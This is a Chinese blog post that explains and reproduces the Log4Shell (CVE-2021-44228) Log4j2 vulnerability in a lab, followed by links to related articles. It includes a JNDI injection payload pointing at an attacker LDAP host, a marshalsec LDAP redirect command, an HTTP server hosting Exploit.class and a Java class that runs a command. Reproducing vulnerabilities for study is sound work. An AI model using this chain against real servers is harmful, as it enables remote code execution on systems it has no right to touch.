log4j2: CVE-2021-44228[RCE]

于 2024-08-07 19:36:00 发布
阅读量510 收藏 10
点赞数 4
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/140971147
版权

漏洞概述

CVE-2021-44228为Apache Log4j2漏洞,被称为"Log4Shell"。攻击者将恶意代码与服务器进行交互,使服务器日志组件将其记录并执行,从而造就RCE远程代码执行漏洞。

漏洞原理

  1. 日志记录机制:Log4j2是一个日志记录工具,允许通过配置文件来定义日志的格式。日志格式中可以使用变量,这些变量在日志记录时会被替换为实际的值。

  2. 变量替换机制:Log4j2支持使用${}来引用变量。例如,${user}可能执行相关代码

  3. JNDI查找支持:Log4j2还支持JNDI查找,允许通过${jndi:...}的形式引用远程资源。

  4. 漏洞触发点:在Log4j2的某些版本中,如果日志配置不当,${jndi:...}表达式可以被外部输入所利用,导致Log4j2尝试解析并执行JNDI查找。

  5. JNDI注入:攻击者通过构造特定的字符串,${jndi:ldap://attacker.com/hello}访问不存在于ldap服务器的内容, 来触发JNDI注入。ldap://attacker.com/是一个指向攻击者控制的LDAP服务器的URL,hello为不存在的文件。

  6. 指定远程服务器恶意代码:当攻击者控制的LDAP服务器没有具体文件时,将从指定动态加载对象,从而使目标服务器加载并执行。

JNDI

JNDI是Java EE的一部分,它提供了一种在Java应用程序中查找和访问各种类型的命名和目录服务的方法。JNDI可以与多种不同的服务进行交互,如LDAP、DNS、文件系统等。

用途:

查找资源:应用程序可以通过JNDI查找和访问远程资源。

LDAP

LDAP是一个轻量级的目录访问协议,用于访问和维护分布式目录信息服务。

用途:

引用恶意代码文件:当服务器查找不存在于LDAP的文件时,将被指引请求,存在于攻击者服务器内的,恶意代码

漏洞利用

存在漏洞的靶机服务器:127.0.0.1

LDAP服务器:127.0.0.1

存在恶意代码文件的远程服务器 kali:192.168.10.128

环境准备:

<1>dnslog生成域名

<2>验证漏洞

输入并运行:${jndi:ldap://u79stc.dnslog.cn}

漏洞利用

1.kali存放代码文件,并开启http服务

┌──(root㉿kali)-[/]
└─# find / -name Exploit.class
/Exploit.class

┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

2.本机开启ldap服务 

 cmd命令行执行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar  marshalsec.jndi.LDAPRefServer http://192.168.10.128:8888//#Exploit 7365

3.靶机访问ldap服务

执行恶意代码打开计算器

import java.io.IOException;

public class Exploit {
    static {
        try {
            // 打开windows电脑的计算器 proof of content
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

4.使用工具进行利用

 start_log4j_POC

target:存在漏洞的地址

DNSLOG_url: 进行域名解析

vps_target:建立反弹连接的主机

Zeddm
关注
Log4j CVE-2021-44228 漏洞及Spring Boot解决方案
oscar999的专栏
12-17 2142
Log4j 的2 到 2.14 版本最近爆出了一个比较大的漏洞漏洞编号是CVE-2021-44228。本篇对该漏洞进行简单介绍, 并介绍Spring Boot项目如何解决该漏洞
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1476
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2-rce漏洞复现(CVE-2021-44228)
Z_l123的博客
04-01 2254
漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭建并启动靶场 DNSLog验证 通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 2709
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 1074
CVE-2021-44228
log4j2 rce (CVE-2021-44228)
weixin_40151476的博客
03-01 964
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
log4j2 远程代码执行漏洞复现(CVE-2021-44228
最新发布
Welcome To Myon'Blog !
03-08 1万+
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 798
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2403
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Log4j2漏洞复现(CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Apache Log4j 2 ​远程代码执行漏洞 ( CVE-2021-44228 )​
itisauto2008的专栏
12-14 2358
Microsoft 继续分析2021 年 12 月 9 日披露的与 Apache Log4j(许多基于 Java 的应用程序中使用的日志记录工具)相关的远程代码执行漏洞( CVE-2021-44228 )​。该漏洞是一种远程代码执行漏洞,可以让未经身份验证的攻击者获得对目标系统的完全访问权限。当易受攻击的 Log4j 2 组件解析和处理特制字符串时,可以触发它。这可能通过任何用户提供的输入发生。 该漏洞编号为CVE-2021-44228,称为“Log4Shell”,影响使用 Log4j 2 版本 2.0.
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1852
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
CVE-2021-44228 Apache Log4j2 远程代码执行漏洞
qq_59201520的博客
03-28 346
Apache Log4j2 lookup feature JNDI injection (CVE-2021-44228)漏洞复现
Apache Log4j2代码执行漏洞复现(cve-2021-44228
Bird&Bird
12-14 9687
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
漏洞复现】log4j2 CVE-2021-44228
zg_111的博客
03-20 2592
漏洞复现】log4j2 CVE-2021-44228漏洞复现
CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
01-10 7483
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell
Log4j2安全 JNDI漏洞 CVE-2021-44228
Keep learing, and stay fast
12-15 1626
12 月 10 日,Apache 开源项目 Log4j 的远程代码执行漏洞CVE-2021-44228) 被公开
cve-2021-44228
08-06
CVE-2021-44228是指Log4j2的JNDI注入漏洞。这个漏洞被认为是“核弹”级别的漏洞,因为Log4j2作为类似JDK级别的基础类库,几乎没有人能够幸免。该漏洞的形成原理是通过Log4j2中的Interpolator类实现了Lookup功能,它在成员变量strLookupMap中保存着各类Lookup功能的真正实现类。当解析字符串时,Interpolator会从strLookupMap中获取对应的Lookup功能实现类,并调用其lookup()方法来执行相应的操作。这个漏洞的危害在于攻击者可以通过构造恶意的JNDI数据源名称来注入恶意代码,从而实现远程命令执行。这可能导致服务器被完全控制,造成严重的安全风险。一个简单的示例是编写一个Java类,通过Runtime.getRuntime().exec()方法执行系统命令,例如打开计算器。因此,对于使用受影响版本的Log4j2的系统,及时升级到修复版本是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值